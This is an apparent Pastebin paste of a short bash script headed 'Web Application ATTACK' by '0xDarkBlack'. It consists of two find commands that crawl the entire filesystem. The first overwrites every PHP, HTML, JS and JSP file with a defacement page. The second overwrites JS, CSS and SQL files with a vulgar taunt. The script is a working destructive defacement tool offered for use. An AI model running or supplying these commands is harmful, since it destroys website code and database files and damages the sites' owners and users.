Advertisement
Guest User

Untitled

a guest
Jul 26th, 2017
131
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.84 KB | None | 0 0
  1. #!/bin/bash
  2. #-------------------------
  3. # Web Application ATTACK
  4. # By 0xDarkBlack
  5. #-------------------------
  6. #_______ ________ __ __________.__ _
  7. #\ _ \ ___ ___\______ \ _____ _______| | _\______ \ | _____ ____ | | __
  8. #/ /_\ \\ \/ / | | \\__ \\_ __ \ |/ /| | _/ | \__ \ _/ ___\| |/ /
  9. #\ \_/ \> < | ` \/ __ \| | \/ < | | \ |__/ __ \\ \___| <
  10. # \_____ /__/\_ \/_______ (____ /__| |__|_ \|______ /____(____ /\___ >__|_ \
  11. # \/ \/ \/ \/ \/ \/ \/ \/ \/
  12.  
  13. find / \( -name "*.php" -o -name "*.html" -o -name "*.js" -o -name "*.jsp" \) -exec sh -c 'cat index.txt > {}' \;
  14. find / \( -name "*.js" -o -name "*.css" -o -name "*.sql" \) -exec sh -c 'echo "@0xdarkBlack FIGHT MY PUSSY" > {}' \;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement